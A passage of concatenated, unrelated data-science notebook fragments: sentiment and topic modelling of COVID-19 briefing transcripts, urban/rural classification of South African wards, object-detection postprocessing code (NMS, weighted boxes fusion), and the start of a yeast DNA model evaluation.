out preprocessing of the text and return a preprocessed list of strings. Parameters ------------- text : (str) the text to be preprocessed min_token_len : (int) min_token_length required irrelevant_pos : (list) a list of irrelevant pos tags Returns ------------- (list) the preprocessed text as a list of strings """ # convert input string to lowercase text = text.lower() # remove multiple whitespace characters text = re.sub(r'\s+',' ', text) # tokenize with spacy, exluding stop words, short tokens, # irrelevant POS, emails, urls, and strings containing # non-alphanumeric chars doc = nlp(text) token_list = [] for token in doc: if token.is_stop == False and len(token.text)>=min_token_len \ and token.pos_ not in irrelevant_pos and token.like_email == False \ and token.like_url == False and token.text.isalnum(): token_list.append(token.lemma_) return token_listApplying the `preprocess()` function defined above to each briefing text:# parallelize and apply preprocessor to each text pandarallel.initialize(verbose=False) briefings_df['pp_text'] = briefings_df.text.parallel_apply(preprocess) briefings_df['pp_text']Let's also create a dataframe that combines all the preprocessed text tokens for a single briefing, for analysis by day:# combine all texts for a single day flatten = lambda l: [item for sublist in l for item in sublist] texts_by_date_df = briefings_df.groupby(by='date')['pp_text'].apply(flatten).to_frame().reset_index()Emotion and Sentiment AnalysisNow that we have a nice clean dataframe to work with, it's time to move on to analysis. Rather than applying the popular [TextBlob](https://textblob.readthedocs.io/en/dev/) or [Vader](https://github.com/cjhutto/vaderSentiment) packages commonly used for sentiment analysis, I thought it would be interesting to also explore the emotional tone of briefing texts.Let's see what we can uncover using the NRC Word-Emotion Association Lexicon, [EmoLex](https://saifmohammad.com/WebPages/NRC-Emotion-Lexicon.htm). In addition to 'positive' and 'negative', we have word associations for eight basic emotion categories.# read in raw emotion lexicon filepath = "../NRC-Sentiment-Emotion-Lexicons/NRC-Emotion-Lexicon-v0.92/NRC-Emotion-Lexicon-Wordlevel-v0.92.txt" emolex_df = pd.read_csv(filepath, names=["word", "emotion", "association"], skiprows=1, sep='\t') # pivot df so we have one row per word, one column per emotion emolex_df = emolex_df.pivot(index='word', columns='emotion', values='association').reset_index() emolex_df.columns.name = 'index' # filter out words without scores, as well as those with more than 7 scores emolex_df = emolex_df[emolex_df.sum(axis=1)>0].reset_index(drop=True) emolex_df = emolex_df[emolex_df.sum(axis=1)<7].reset_index(drop=True) emolex_dfWe can now use this lexicon to easily retrieve associations for the words in a single briefing `text`:briefings_df.text[504] print(briefings_df.pp_text[504]) emolex_df[pd.DataFrame(emolex_df.word.tolist()).isin(briefings_df.pp_text[504]).any(1)]Following this approach, let's calculate and store aggregate emotion scores for each briefing paragraph:# create empty df to store aggregated emotion calcs data = pd.DataFrame([]) for tokens in briefings_df['pp_text']: paragraph_emos = emolex_df[pd.DataFrame(emolex_df.word.tolist()).isin(tokens).any(1)].mean() data = data.append(paragraph_emos, ignore_index=True) # combine aggregated emotion scores with transcript df briefings_df = briefings_df.join(data) # drop empty 'word' column, fill NaNs with zero briefings_df = briefings_df.drop(columns=['word']) briefings_df = briefings_df.fillna(0) briefings_df.head()As well as for each complete briefing:# create empty df to store aggregated emotion calcs data = pd.DataFrame([]) for tokens in texts_by_date_df['pp_text']: paragraph_emos = emolex_df[pd.DataFrame(emolex_df.word.tolist()).isin(tokens).any(1)].mean() data = data.append(paragraph_emos, ignore_index=True) # combine aggregated emotion scores with text df texts_by_date_df = texts_by_date_df.join(data) texts_by_date_df.head()Topic ModellingNow that we have emotion and sentiment scores, let's apply topic modelling to see if we can identify the major themes discussed during the briefings and classify each briefing `text` accordingly. We'll use the [gensim](https://pypi.org/project/gensim/) package to build a Latent Dirichlet Allocation (LDA) model.import gensim.corpora as corpora from gensim import models import pyLDAvis.gensimFirst, we create a dictionary of all of the word tokens we consider relevant for topic modelling:# build dictionary corpus = briefings_df['pp_text'].tolist() dictionary = corpora.Dictionary(corpus) # filter extremes, removing tokens that appear in either: # fewer than 10 texts, or in more than 10% of all tets dictionary.filter_extremes(no_below = 10, no_above = 0.1) # define words to be manually removed and retrieve their indexes remove_words = ['crosstalk', 'question', 'inaudible', 'mr', 'sir', 'dr'] del_indexes = [k for k,v in dictionary.items() if v in remove_words] # remove unwanted word ids from the dictionary dictionary.filter_tokens(bad_ids=del_indexes)Next, a [document-term co-occurrence matrix](https://en.wikipedia.org/wiki/Document-term_matrix), consisting of the bag-of-words (BoW) representation of each `text`:doc_term_matrix = [dictionary.doc2bow(doc) for doc in corpus]With both of these, we can build and visualize an LDA topic model:lda_model = models.LdaModel(corpus=doc_term_matrix, id2word=dictionary, num_topics=6, passes=20, random_state=123) viz = pyLDAvis.gensim.prepare(lda_model, doc_term_matrix, dictionary, sort_topics=False) # enable for interactive topic model visualization: # pyLDAvis.enable_notebook() # vizAfter inspecting the interactive output rendered by [pyLDAvis](https://github.com/bmabey/pyLDAvis), experimenting with different numbers of topics, and filtering some unhelpful and extreme tokens, we see logical results with the following six topics being identified:1. Economy2. International3. Policy & Guidelines4. Testing5. Ventilators & NY Outbreak6. Other![](../imgs/topics.png) Now let's use the topic model to predict the topic for each individual `text`:topic_labels = {0:'Economy', 1:'International', 2:'Policy & Guidelines', 3:'Testing', 4:'Ventilators & NY Outbreak', 5:'Other' } def get_most_prob_topic(unseen_text, model = lda_model): """ Given an unseen_document, and a trained LDA model, this function finds the most likely topic (topic with the highest probability) from the topic distribution of the unseen document and returns the best topic Parameters ------------ unseen_text : (str) the text to be labeled with a topic model : (gensim ldamodel) the trained LDA model Returns: ------------- (str) the most likely topic label Examples: ---------- >> get_most_prob_topic("We're building so so so many ventilators.", model = lda) Ventilators """ # obtain bow vector for unseen text bow_vector = dictionary.doc2bow(unseen_text) # calculate topic scores for unseen text scores_df = pd.DataFrame(lda_model[bow_vector], columns =['topic', 'score']) # find topic name of max score topic_name = topic_labels[scores_df.loc[scores_df['score'].idxmax(), 'topic']] best_score = scores_df['score'].max() return topic_name, best_score; # create empty lists to store prediction strings predictions = [] scores = [] # call function for each unseen text, appending predictions to list for text in briefings_df['pp_text'].tolist(): # only predict a topic for texts where there are 4 or more tokens if len(text) > 4: topic, value = get_most_prob_topic(text) predictions.append(topic) scores.append(value) else: predictions.append(np.nan) scores.append(np.nan) # add prediction values to main df briefings_df['topic_pred'] = predictions briefings_df['topic_score'] = scores # save scored df to csv briefings_df.to_csv("../data/scored_briefings.csv",index=False) briefings_df[['pp_text','topic_pred','topic_score']].head()Analysis and Visualization As anyone who was following along might expect, we see that the briefings consistently strike a more positive than negative tone:# prepare dataframe of aggregate sentiment scores by date for altair plotting sentiment_by_date = texts_by_date_df[['positive', 'negative', 'date']] sentiment_by_date = sentiment_by_date.melt(['date'], var_name='emo', value_name='score') # plot aggregated scores alt.Chart(sentiment_by_date).mark_line().encode( alt.X('date:T', axis=alt.Axis(title='Briefing Date', labelAngle=0)), alt.Y('score:Q', axis=alt.Axis(title='Sentiment Score')), alt.Color('emo:N', legend=alt.Legend(title='Sentiment'), sort=['positive']) ).properties( title = 'Sentiment Scores, Aggregated by Briefing', height = 300, width = 800 )As far as emotional tone goes, we see consistently strong scores for 'trust' from briefing to briefing, with 'anticipation' and 'fear' being the next most prevalent:# prepare dataframe of aggregate emotion scores by date for altair plotting emotion_by_date = texts_by_date_df.drop(columns=['positive', 'negative', 'pp_text']) emotion_by_date = emotion_by_date.melt(['date'], var_name='emo', value_name='score') # plot aggregated scores alt.Chart(emotion_by_date).mark_line().encode( alt.X('date:T', axis=alt.Axis(title='Briefing Date', labelAngle=0)), alt.Y('score:Q', axis=alt.Axis(title='Emotion Score')), alt.Color('emo:N', legend=alt.Legend(title='Emotion'), sort=['trust','anticipation','fear','joy','sadness','anger','surprise','disgust']) ).properties( title = 'Emotion Scores, Aggregated by Briefing', height = 400, width = 800 )What about emotion scores with respect to specific topics? Looking at a heatmap that shows fear scores broken down by topic, on March 5th and 6th we note an increasingly fearful tone regarding the international spread of the virus. It's worth noting here that Vice President Pence had been the chair of the Task Force from February 26th up until these dates, with President Trump transitioning to be the point person in the days that followed.emo = 'fear' topics_by_date = briefings_df.groupby(['topic_pred', 'date']).mean().reset_index() topics_by_date = topics_by_date.melt(['topic_pred', 'date'], var_name='emo', value_name='score') alt.Chart(topics_by_date[topics_by_date['emo'] == emo]).mark_rect().encode( alt.X('date:O', axis=alt.Axis(title='Briefing Date')), alt.Y('topic_pred:N', axis=alt.Axis(title='Topic')), alt.Color('score:Q', legend=alt.Legend(title=['Aggregated', emo.capitalize()+' Score']), scale=alt.Scale(scheme='lighttealblue')) ).properties(title = 'Heatmap of ' + emo.capitalize() + ' Scores by Topic')Interestingly we also see a more negative tone from Dr. Fauci during these early briefings, with a notable peak on March 6th:# prepare dataframe of aggregate sentiment scores by date for altair plotting facui_df = briefings_df[briefings_df['speaker']=='Dr. '] fauci_by_date = facui_df.groupby(['date']).mean().reset_index() sentiment_by_date = fauci_by_date[['positive', 'negative', 'date']] sentiment_by_date = sentiment_by_date.melt(['date'], var_name='emo', value_name='score') # plot aggregated scores alt.Chart(sentiment_by_date).mark_line().encode( alt.X('date:T', axis=alt.Axis(title='Briefing Date', labelAngle=0)), alt.Y('score:Q', axis=alt.Axis(title='Sentiment Score')), alt.Color('emo:N', legend=alt.Legend(title='Sentiment'), sort=['positive']) ).properties( title = 'Sentiment Scores for Dr. , Aggregated by Briefing', height = 300, width = 800 )Let's look at sentiment scores for some specific words The scores we've calculated can also be used to compare the sentiment or emotion for briefing texts containing specific words, as shown below for 'Hydroxychloroquine' and 'China':# prepare series of aggregate sentiment scores overall_sentiments = briefings_df.mean()[['positive','negative']] hydroxy_sentiments = briefings_df[briefings_df['text'].str.contains("droxy")].mean()[['positive','negative']] china_sentiments = briefings_df[briefings_df['text'].str.contains("Chin")].mean()[['positive','negative']] # merge series into a single df for plotting in altair word_sentiments = pd.concat([overall_sentiments, hydroxy_sentiments, china_sentiments], axis=1).rename(columns={0: "Overall", 1: "Hydroxychloroquine", 2: "China"}).reset_index() word_sentiments = word_sentiments.rename(columns={'index': "sentiment"}) word_sentiments = word_sentiments.melt(['sentiment'], var_name='word', value_name='score') alt.Chart(word_sentiments).mark_bar().encode( alt.X('word:N', axis=alt.Axis(title='')), alt.Y('score:Q', axis=alt.Axis(title='Sentiment Score')), alt.Color('word:N', legend=alt.Legend(title=['Word']), sort=['Overall','Hydroxychloroquine','China']), alt.Facet('sentiment:N', title='Sentiment Scores for Texts Containing Specific Words') )Urban vs. rural regionsaim: classify wards into rural or urbandefinition: population size? number households, individuals?+ rural+ urban#import libraries import pandas as pd import numpy as np import seaborn as sns from matplotlib import pyplot as plt %matplotlib inline # import data df = pd.read_csv("/Users/janaconradi/neuefische/Zindi_Data_female_households_RSA/data/Train.csv") # check out data df.head() df.total_individuals.describe() sns.boxplot(data=df.total_individuals) #create a dataframe with only geodata geo_df = df[["ward", "total_individuals", "target", "ADM4_PCODE", "lat", "lon"]] geo_df.tail() geo_df.info() RangeIndex: 2822 entries, 0 to 2821 Data columns (total 6 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 ward 2822 non-null object 1 total_individuals 2822 non-null float64 2 target 2822 non-null float64 3 ADM4_PCODE 2822 non-null object 4 lat 2822 non-null float64 5 lon 2822 non-null float64 dtypes: float64(4), object(2) memory usage: 132.4+ KBData from south african administrative boundariesfrom the Information Technology Outreach Services (ITOS) [link](https://data.humdata.org/dataset/south-africa-admin-level-1-boundaries)admin4_df = pd.read_csv("/Users/janaconradi/neuefische/Zindi_Data_female_households_RSA/data/zaf_adminboundaries_tabulardata - Admin4.csv", decimal=",") admin4_df.head()Data cleaning#make a new dataframe with only needed informations: admin4Pcode and Shape_Area ward_size = admin4_df[["admin4Pcode", "Shape_Area"]] ward_size.head() ward_size.info() # Convert admin4Pcode to string ward_size["admin4Pcode"] = ward_size["admin4Pcode"].astype("string") # rename admin4Pcode to ADM4_PCODE so the name is equal in both df ward_size.rename({"admin4Pcode" : "ADM4_PCODE"}, axis=1, inplace=True) # merge geo_df and ward_size to one table on the zip code geo_df = geo_df.merge(ward_size, on="ADM4_PCODE", how="inner",) # check out new merged table geo_df.head()Shape Areashape_area was in the wrong dimension (units were not given)I used wazimap to confirm my calculations:https://wazimap.co.za/profiles/ward-41601002-letsemeng-ward-2-41601002/# calculation of the population density : number of individuals per km2 geo_df["pop_density"] = geo_df.total_individuals / (geo_df.Shape_Area*10000) geo_df.head()Classification of urban and rural placesAccording to the definition of Statistics South Africa, Census 2001 [link](http://www.statssa.gov.za/census/census_2001/urban_rural/urbanrural.pdf):urban is defined:+ local population size >= 1000+ population density >= 500# query on urban type geo_df.query("pop_density >= 500 & total_individuals >= 1000") #create new column based on threshold, to simplify only pop density as threshold was chosen conditions = [ geo_df['pop_density'] >= 500, #urban geo_df['pop_density'] < 500 #rural ] choices = ["urban","rural"] geo_df["ward_type"] = np.select(conditions, choices, default="NA") geo_df.head(20) geo_df.groupby(by="ward_type").count() geo_df.groupby(by="ward_type").median() sns.barplot(data=geo_df, y="target", x="ward_type") #convert ne dataframe to csv and put it into the data folder geo_df.to_csv("data/geo_df.csv")Postprocessing> Smoothing, combining etc.#hide from nbdev.showdoc import * #export from drone_detector.imports import * from drone_detector.utils import * from skimage.morphology import erosion, dilation from scipy.ndimage.morphology import binary_fill_holesNon-maximum suppression First the commonly used NMS with bounding boxes, that prioritizes either confidence score (default) or bounding box area.# export # Malisiewicz et al. def non_max_suppression_fast(boxes, scores, overlap_thresh:float, sort_criterion:str='score'): "Possibility to sort boxes by score (default) or area" # if there are no boxes, return an empty list if len(boxes) == 0: return [] # if the bounding boxes integers, convert them to floats -- # this is important since we'll be doing a bunch of divisions if boxes.dtype.kind == "i": boxes = boxes.astype("float") # sort prediction by scores, # initialize the list of picked indexes pick = [] # grab the coordinates of the bounding boxes x1 = boxes[:,0] y1 = boxes[:,1] x2 = boxes[:,2] y2 = boxes[:,3] # compute the area of the bounding boxes and sort the bounding # boxes by the bottom-right y-coordinate of the bounding box area = (x2 - x1 + 1) * (y2 - y1 + 1) if sort_criterion == 'score': idxs = np.argsort(scores) elif sort_criterion == 'area': idxs = np.argsort(area) else: print('Unknown sort criteria, reverting to "score"') idxs = np.argsort(scores) # keep looping while some indexes still remain in the indexes # list while len(idxs) > 0: # grab the last index in the indexes list and add the # index value to the list of picked indexes last = len(idxs) - 1 i = idxs[last] pick.append(i) # find the largest (x, y) coordinates for the start of # the bounding box and the smallest (x, y) coordinates # for the end of the bounding box xx1 = np.maximum(x1[i], x1[idxs[:last]]) yy1 = np.maximum(y1[i], y1[idxs[:last]]) xx2 = np.minimum(x2[i], x2[idxs[:last]]) yy2 = np.minimum(y2[i], y2[idxs[:last]]) # compute the width and height of the bounding box w = np.maximum(0, xx2 - xx1 + 1) h = np.maximum(0, yy2 - yy1 + 1) # compute the ratio of overlap overlap = (w * h) / area[idxs[:last]] # delete all indexes from the index list that have idxs = np.delete(idxs, np.concatenate(([last], np.where(overlap > overlap_thresh)[0]))) # return indices for selected bounding boxes return pick #return boxes[pick].astype("int")Non-max suppression can in theory be applied also on polygons, but it hasn't been used in any publications as far as I know.If `non_max_suppression_poly` is used to eliminate polygons, threshold might need to be smaller than typical value of 0.7 that is used.# export from drone_detector.metrics import poly_IoU def non_max_suppression_poly(geoms, scores, overlap_thresh:float, sort_criterion:str='score'): "Possibility to sort geoms by score (default) or area" # if there are no geoms, return an empty list if len(geoms) == 0: return [] # sort prediction by scores, # initialize the list of picked indexes pick = [] # compute the area of the bounding geoms and sort the bounding # geoms by the bottom-right y-coordinate of the bounding box area = np.array([geom.area for geom in geoms]) if sort_criterion == 'score': idxs = np.argsort(scores) elif sort_criterion == 'area': idxs = np.argsort(area) else: print('Unknown sort criteria, reverting to "score"') idxs = np.argsort(scores) # keep looping while some indexes still remain in the indexes # list while len(idxs) > 0: # grab the last index in the indexes list and add the # index value to the list of picked indexes last = len(idxs) - 1 i = idxs[last] pick.append(i) # compute the ratio of overlap with all other polygons overlap = np.array([poly_IoU(geoms[i], geoms[k]) for k in idxs[:last]]) # delete all indexes from the index list that have # overlap larger than overlap_thresh idxs = np.delete(idxs, np.concatenate(([last], np.where(overlap > overlap_thresh)[0]))) # return indices for selected bounding geoms return pickSome utils to run above functions to `GeoDataFrames`# export def do_nms(gdf:gpd.GeoDataFrame, nms_thresh=0.7, crit='score'): gdf = gdf.copy() np_bboxes = np.array([b.bounds for b in gdf.geometry]) scores = gdf.score.values idxs = non_max_suppression_fast(np_bboxes, scores, nms_thresh, crit) gdf = gdf.iloc[idxs] return gdf def do_poly_nms(gdf:gpd.GeoDataFrame, nms_thresh=0.1, crit='score'): gdf = gdf.copy() scores = gdf.score.values idxs = non_max_suppression_poly(gdf.geometry.values, scores, nms_thresh, crit) gdf = gdf.iloc[idxs] return gdf def do_min_rot_rectangle_nms(gdf:gpd.GeoDataFrame, nms_thresh=0.7, crit='score'): gdf = gdf.copy() scores = gdf.score.values boxes = np.array([g.minimum_rotated_rectangle for g in gdf.geometry.values]) idxs = non_max_suppression_poly(boxes, scores, nms_thresh, crit) gdf = gdf.iloc[idxs] return gdfWeighted boxes fusionOriginally presented by [Solovyev et al (2021)](https://arxiv.org/abs/1910.13302), and available in [https://github.com/ZFTurbo/Weighted-Boxes-Fusion]. Code presented here is modified to keep track of original bounding boxes for mask fusion, and due to numpy version requirements we do not use numba here. As WBF expects normalized coordinates, first some helpers to normalize and denormalize geocoordinates.# export def normalize_bbox_coords(tot_bounds, bboxes): xmin = tot_bounds[0] ymin = tot_bounds[1] width = tot_bounds[2] - tot_bounds[0] height = tot_bounds[3] - tot_bounds[1] norm_bboxes = [((b[0]-xmin)/(width), (b[1]-ymin)/(height), (b[2]-xmin)/(width), (b[3]-ymin)/(height)) for b in bboxes] return norm_bboxes def denormalize_bbox_coords(tot_bounds, bboxes): xmin = tot_bounds[0] ymin = tot_bounds[1] width = tot_bounds[2] - tot_bounds[0] height = tot_bounds[3] - tot_bounds[1] norm_bboxes = [((b[0]*width+xmin), (b[1]*height+ymin), (b[2]*width+xmin), (b[3]*height+ymin)) for b in bboxes] return norm_bboxes # export import warnings def bb_intersection_over_union(A, B) -> float: xA = max(A[0], B[0]) yA = max(A[1], B[1]) xB = min(A[2], B[2]) yB = min(A[3], B[3]) # compute the area of intersection rectangle interArea = max(0, xB - xA) * max(0, yB - yA) if interArea == 0: return 0.0 # compute the area of both the prediction and ground-truth rectangles boxAArea = (A[2] - A[0]) * (A[3] - A[1]) boxBArea = (B[2] - B[0]) * (B[3] - B[1]) iou = interArea / float(boxAArea + boxBArea - interArea) return iou def prefilter_boxes(boxes, scores, labels, weights, thr): # Create dict with boxes stored by its label new_boxes = dict() for t in range(len(boxes)): if len(boxes[t]) != len(scores[t]): print('Error. Length of boxes arrays not equal to length of scores array: {} != {}'.format(len(boxes[t]), len(scores[t]))) sys.exit() if len(boxes[t]) != len(labels[t]): print('Error. Length of boxes arrays not equal to length of labels array: {} != {}'.format(len(boxes[t]), len(labels[t]))) sys.exit() for j in range(len(boxes[t])): score = scores[t][j] if score < thr: continue label = int(labels[t][j]) box_part = boxes[t][j] x1 = max(float(box_part[0]), 0.) y1 = max(float(box_part[1]), 0.) x2 = max(float(box_part[2]), 0.) y2 = max(float(box_part[3]), 0.) # Box data checks if x2 < x1: warnings.warn('X2 < X1 value in box. Swap them.') x1, x2 = x2, x1 if y2 < y1: warnings.warn('Y2 < Y1 value in box. Swap them.') y1, y2 = y2, y1 if x1 > 1: warnings.warn('X1 > 1 in box. Set it to 1. Check that you normalize boxes in [0, 1] range.') x1 = 1 if x2 > 1: warnings.warn('X2 > 1 in box. Set it to 1. Check that you normalize boxes in [0, 1] range.') x2 = 1 if y1 > 1: warnings.warn('Y1 > 1 in box. Set it to 1. Check that you normalize boxes in [0, 1] range.') y1 = 1 if y2 > 1: warnings.warn('Y2 > 1 in box. Set it to 1. Check that you normalize boxes in [0, 1] range.') y2 = 1 if (x2 - x1) * (y2 - y1) == 0.0: warnings.warn("Zero area box skipped: {}.".format(box_part)) continue # [label, score, weight, model index, x1, y1, x2, y2] b = [int(label), float(score) * weights[t], weights[t], t, x1, y1, x2, y2] if label not in new_boxes: new_boxes[label] = [] new_boxes[label].append(b) # Sort each list in dict by score and transform it to numpy array for k in new_boxes: current_boxes = np.array(new_boxes[k]) new_boxes[k] = current_boxes[current_boxes[:, 1].argsort()[::-1]] return new_boxes def get_weighted_box(boxes, conf_type='avg'): """ Create weighted box for set of boxes :param boxes: set of boxes to fuse :param conf_type: type of confidence one of 'avg' or 'max' :return: weighted box (label, score, weight, x1, y1, x2, y2) """ box = np.zeros(8, dtype=np.float32) conf = 0 conf_list = [] w = 0 for b in boxes: box[4:] += (b[1] * b[4:]) conf += b[1] conf_list.append(b[1]) w += b[2] box[0] = boxes[0][0] if conf_type == 'avg': box[1] = conf / len(boxes) elif conf_type == 'max': box[1] = np.array(conf_list).max() elif conf_type in ['box_and_model_avg', 'absent_model_aware_avg']: box[1] = conf / len(boxes) box[2] = w box[3] = -1 # model index field is retained for consistensy but is not used. box[4:] /= conf return box def find_matching_box_quickly(boxes_list, new_box, match_iou): """ Reimplementation of find_matching_box with numpy instead of loops. Gives significant speed up for larger arrays (~100x). This was previously the bottleneck since the function is called for every entry in the array. """ def bb_iou_array(boxes, new_box): # bb interesection over union xA = np.maximum(boxes[:, 0], new_box[0]) yA = np.maximum(boxes[:, 1], new_box[1]) xB = np.minimum(boxes[:, 2], new_box[2]) yB = np.minimum(boxes[:, 3], new_box[3]) interArea = np.maximum(xB - xA, 0) * np.maximum(yB - yA, 0) # compute the area of both the prediction and ground-truth rectangles boxAArea = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) boxBArea = (new_box[2] - new_box[0]) * (new_box[3] - new_box[1]) iou = interArea / (boxAArea + boxBArea - interArea) return iou if boxes_list.shape[0] == 0: return -1, match_iou # boxes = np.array(boxes_list) boxes = boxes_list ious = bb_iou_array(boxes[:, 4:], new_box[4:]) ious[boxes[:, 0] != new_box[0]] = -1 best_idx = np.argmax(ious) best_iou = ious[best_idx] if best_iou <= match_iou: best_iou = match_iou best_idx = -1 return best_idx, best_iou def weighted_boxes_fusion(boxes_list, scores_list, labels_list, weights=None, iou_thr=0.55, skip_box_thr=0.0, conf_type='avg', allows_overflow=False): ''' :param boxes_list: list of boxes predictions from each model, each box is 4 numbers. It has 3 dimensions (models_number, model_preds, 4) Order of boxes: x1, y1, x2, y2. We expect float normalized coordinates [0; 1] :param scores_list: list of scores for each model :param labels_list: list of labels for each model :param weights: list of weights for each model. Default: None, which means weight == 1 for each model :param iou_thr: IoU value for boxes to be a match :param skip_box_thr: exclude boxes with score lower than this variable :param conf_type: how to calculate confidence in weighted boxes. 'avg': average value, 'max': maximum value, 'box_and_model_avg': box and model wise hybrid weighted average, 'absent_model_aware_avg': weighted average that takes into account the absent model. :param allows_overflow: false if we want confidence score not exceed 1.0 :return: boxes: boxes coordinates (Order of boxes: x1, y1, x2, y2). :return: scores: confidence scores :return: labels: boxes labels :return: originals: original boxes ''' if weights is None: weights = np.ones(len(boxes_list)) if len(weights) != len(boxes_list): print('Warning: incorrect number of weights {}. Must be: {}. Set weights equal to 1.'.format(len(weights), len(boxes_list))) weights = np.ones(len(boxes_list)) weights = np.array(weights) if conf_type not in ['avg', 'max', 'box_and_model_avg', 'absent_model_aware_avg']: print('Unknown conf_type: {}. Must be "avg", "max" or "box_and_model_avg", or "absent_model_aware_avg"'.format(conf_type)) exit() filtered_boxes = prefilter_boxes(boxes_list, scores_list, labels_list, weights, skip_box_thr) if len(filtered_boxes) == 0: return np.zeros((0, 4)), np.zeros((0,)), np.zeros((0,)) overall_boxes = [] original_boxes = [] for label in filtered_boxes: boxes = filtered_boxes[label] new_boxes = [] weighted_boxes = np.empty((0,8)) # Clusterize boxes for j in range(0, len(boxes)): index, best_iou = find_matching_box_quickly(weighted_boxes, boxes[j], iou_thr) if index != -1: new_boxes[index].append(boxes[j]) weighted_boxes[index] = get_weighted_box(new_boxes[index], conf_type) else: new_boxes.append([boxes[j].copy()]) weighted_boxes = np.vstack((weighted_boxes, boxes[j].copy())) original_boxes.append(new_boxes) # Rescale confidence based on number of models and boxes for i in range(len(new_boxes)): clustered_boxes = np.array(new_boxes[i]) if conf_type == 'box_and_model_avg': # weighted average for boxes weighted_boxes[i, 1] = weighted_boxes[i, 1] * len(clustered_boxes) / weighted_boxes[i, 2] # identify unique model index by model index column _, idx = np.unique(clustered_boxes[:, 3], return_index=True) # rescale by unique model weights weighted_boxes[i, 1] = weighted_boxes[i, 1] * clustered_boxes[idx, 2].sum() / weights.sum() elif conf_type == 'absent_model_aware_avg': # get unique model index in the cluster models = np.unique(clustered_boxes[:, 3]).astype(int) # create a mask to get unused model weights mask = np.ones(len(weights), dtype=bool) mask[models] = False # absent model aware weighted average weighted_boxes[i, 1] = weighted_boxes[i, 1] * len(clustered_boxes) / (weighted_boxes[i, 2] + weights[mask].sum()) elif conf_type == 'max': weighted_boxes[i, 1] = weighted_boxes[i, 1] / weights.max() elif not allows_overflow: weighted_boxes[i, 1] = weighted_boxes[i, 1] * min(len(weights), len(clustered_boxes)) / weights.sum() else: weighted_boxes[i, 1] = weighted_boxes[i, 1] * len(clustered_boxes) / weights.sum() overall_boxes.append(weighted_boxes) original_boxes = [item for sublist in original_boxes for item in sublist] overall_boxes = np.concatenate(overall_boxes, axis=0) sidx = overall_boxes[:, 1].argsort() overall_boxes = overall_boxes[sidx[::-1]] boxes = overall_boxes[:, 4:] scores = overall_boxes[:, 1] labels = overall_boxes[:, 0] # sort originals accoring to wbf #original_boxes = original_boxes[0] wbfo = [original_boxes[i] for i in sidx[::-1]] return boxes, scores, labels, wbfo # export def do_wbf(gdf:gpd.GeoDataFrame, iou_thr=0.55, skip_box_thr=0.5): """Run weighted_boxes_fusion and returns a gpd.GeoDataFrame where geometries are replaced by new bounding boxes. Do not use with instance segmentation data unless you want to replace your results with bounding boxes """ np_bboxes = [b.bounds for b in gdf.geometry] np_bboxes = normalize_bbox_coords(gdf.total_bounds, np_bboxes) np_bboxes = [[b for b in np_bboxes]] scores = [[v for v in gdf.score.values]] labels = [[l for l in gdf.label.values]] wbf_boxes, wbf_scores, wbf_labels, _ = weighted_boxes_fusion(np_bboxes, scores, labels, iou_thr=iou_thr, skip_box_thr=skip_box_thr) wbf_gdf = gpd.GeoDataFrame() wbf_gdf['label'] = wbf_labels wbf_gdf['score'] = wbf_scores wbf_boxes = denormalize_bbox_coords(gdf.total_bounds, wbf_boxes) wbf_gdf['geometry'] = [box(*bbox) for bbox in wbf_boxes] wbf_gdf.crs = gdf.crs return wbf_gdf # export def do_wsf(gdf:gpd.GeoDataFrame, iou_thr=0.55, skip_box_thr=0.5): np_bboxes = [b.bounds for b in gdf.geometry] np_bboxes = normalize_bbox_coords(gdf.total_bounds, np_bboxes) np_bboxes = [[b for b in np_bboxes]] scores = [[v for v in gdf.score.values]] labels = [[l for l in gdf.label.values]] wbf_boxes, wbf_scores, wbf_labels, originals = weighted_boxes_fusion(np_bboxes, scores, labels, iou_thr=iou_thr, skip_box_thr=skip_box_thr) wbf_gdf = gpd.GeoDataFrame() wbf_gdf['label'] = wbf_labels wbf_gdf['score'] = wbf_scores wbf_boxes = denormalize_bbox_coords(gdf.total_bounds, wbf_boxes) wbf_gdf['geometry'] = [box(*bbox) for bbox in wbf_boxes] wbf_gdf.crs = gdf.crs wbf_scores = [] wbf_labels = [] wbf_masks = [] for i, wbox in tqdm(enumerate(wbf_gdf.itertuples())): wbf_scores.append(wbox.score) wbf_labels.append(wbox.label) orig_bboxes = [bbox[4:] for bbox in originals[i]] orig_bboxes = denormalize_bbox_coords(gdf.total_bounds, orig_bboxes) orig_bboxes = [box(*bounds) for bounds in orig_bboxes] orig_masks = [m for m in gdf.geometry if box(*m.bounds) in orig_bboxes] mask = shapely.ops.unary_union(orig_masks) mask = mask.intersection(wbox.geometry) wbf_masks.append(mask) mask_gdf = gpd.GeoDataFrame() mask_gdf['label'] = wbf_labels mask_gdf['score'] = wbf_scores mask_gdf['geometry'] = wbf_masks mask_gdf.crs = gdf.crs return mask_gdfSmoothing and filling holes Below functions are run before converting IceVision preds to COCO or shapefile format.# export def fill_holes(preds:list) -> list: "Run `binary_fill_holes` to predicted binary masks" for i, p in tqdm(enumerate(preds)): for j in rangeof(p.pred.detection.label_ids): p_mask = p.pred.detection.mask_array.to_mask(p.height, p.width).data[j] p.pred.detection.mask_array.data[j] = binary_fill_holes(p_mask).astype(np.int8) return preds def dilate_erode(preds:list) -> list: "Run dilation followed by erosion in order to smooth masks" for i, p in tqdm(enumerate(preds)): for j in rangeof(p.pred.detection.label_ids): p_mask = p.pred.detection.mask_array.to_mask(p.height, p.width).data[j] p.pred.detection.mask_array.data[j] = erosion(dilation(p_mask)) return predsA script that detects errors in a `gcode` file would be helpful.def check(path): passEvaluate yeast DNA regression model on test setHere we evaluate the model we trained using the training set (90%) while monitoring performance on the validation set (5%). For evaluation, we use the held-out test set (5%) which was never imported into the Peltarion platform. The training/validation/test split is (as far as we know) the same as in the [Deep learning of the regulatory grammar of yeast 5′ untranslated regions from 500,000 random sequences](https://genome.cshlp.org/content/27/12/2015) paper, so we can directly compare with the figures in that paper.import numpy as np import pandas as pd import seaborn as sb from sklearn.metrics import explained_variance_score import sidekickAs part of the data preparation, we exported Numpy arrays with training, validation and test input features (one-hot encoded DNA sequences) and labels. Now we load the test sequences and labels that were prepared then, and check that the shapes of the data look right.X_test = np.load('yeast_seq_test.npy') y_test = np.load('yeast_labels_test.npy') print(X_test.shape) print(y_test.shape)(24468, 4, 70, 1) (24468, 1)Indeed, there are ~25,000 test examples, corresponding to 5% of the total of almost 500,000 sequences. The shape of the sequence data is (4, 70, 1), corresponding to 4 values for one-hot encoding the nucleotides A, C, G, T, 70 values for the 50 nucleotides with a padding of 10 on each side, and one dummy dimension that enables us 